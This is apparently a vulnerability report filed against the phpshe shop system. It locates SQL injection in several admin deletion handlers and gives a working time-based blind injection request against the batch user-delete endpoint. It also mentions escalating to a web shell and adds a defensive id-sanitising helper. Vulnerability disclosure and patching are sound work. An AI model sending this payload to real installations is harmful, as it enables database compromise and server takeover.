I found multiple SQL injection in the background.
To do
#INPIT
p0desta
Created on 2018-10-18 23:52
1. A vulnerability point. Look at the code in admin/user.php:

```php
case 'del':
    pe_token_match();
    if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
        pe_success('会员删除成功!');
    } else {
        pe_error('会员删除失败...');
    }
    break;
```

It is found that if one is deleted at a time, intval processing will be performed. If they are deleted in batches, the values are substituted directly into the statement, and the payload is constructed as follows.

```http
POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1

checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#
```

2. Additional code with this type of situation.

admin/userbank.php

```php
case 'del':
    pe_token_match();
    $userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
    if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
        pe_success('删除成功!');
    } else {
        pe_error('删除失败...');
    }
    break;
```

admin/userlevel.php

```php
case 'del':
    pe_token_match();
    $userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
    if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
        cache_write('userlevel');
        userlevel_callback();
        pe_success('删除成功!');
    } else {
        pe_error('删除失败...');
    }
    break;
```

admin/ad.php

```php
case 'del':
    pe_token_match();
    $ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
    if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
        cache_write('ad');
        pe_success('删除成功!');
    } else {
        pe_error('删除失败...');
    }
    break;
//####################// Ad state //####################//
case 'state':
    pe_token_match();
    $ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
    if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
        cache_write('ad');
        pe_success("操作成功!");
    } else {
        pe_error("操作失败...");
    }
    break;
//####################// Ad list //####################//
default :
    $_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
    $_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
    $sql_where .= " order by `ad_order` asc, `ad_id` desc";
    $info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
```

3. Now I am looking for another example to verify. If there is permission in the target environment, we can read the file or write the file to getshell.
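A defensive normalisation of the id parameter, added here as an example and not phpshe's own code: the four handlers above only apply `intval()` on the single-id path (userbank.php not even there), so the batch `[]` path reaches `pe_delete()` untouched. The helper `pe_int_ids()` is a hypothetical name; it assumes `pe_delete()` interpolates array values into the query as received, and it accepts only strictly numeric ids on both paths.

```php
<?php
// Added example (not phpshe code): coerce an id parameter to a list of
// positive integers whether it arrived as a single $_g_id or as a batch
// $_p_user_id[] array. Non-numeric entries are dropped rather than cast, so
// a value such as "2') and ..." is rejected instead of silently becoming 2.
function pe_int_ids($value)
{
    $ids = is_array($value) ? $value : array($value);
    $clean = array();
    foreach ($ids as $id) {
        if (!is_int($id) && !is_string($id)) {
            continue; // nested arrays / objects are never valid ids
        }
        $s = (string) $id;
        // Strictly digits only, bounded length, and greater than zero.
        if (preg_match('/^\d{1,10}$/', $s) && (int) $s > 0) {
            $clean[] = (int) $s;
        }
    }
    return array_values(array_unique($clean));
}

// How the user.php 'del' branch would use it (kept in the project's style):
//
// case 'del':
//     pe_token_match();
//     $user_id = pe_int_ids(is_array($_p_user_id) ? $_p_user_id : $_g_id);
//     if (!$user_id) {
//         pe_error('会员删除失败...');
//         break;
//     }
//     if ($db->pe_delete('user', array('user_id'=>$user_id))) {
//         pe_success('会员删除成功!');
//     } else {
//         pe_error('会员删除失败...');
//     }
//     break;

// Constructed inputs mirroring the report: the single-delete path, a clean
// batch, and a batch carrying the injected value from the request above.
var_dump(pe_int_ids('7'));
var_dump(pe_int_ids(array('3', '5', '3')));
var_dump(pe_int_ids(array('2', "2') and if(1,sleep(5),1)#")));
```

The same helper applies unchanged to the userbank, userlevel and ad handlers, since each of them builds its id list the same way.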
https://gitee.com/koyshe/phpshe.git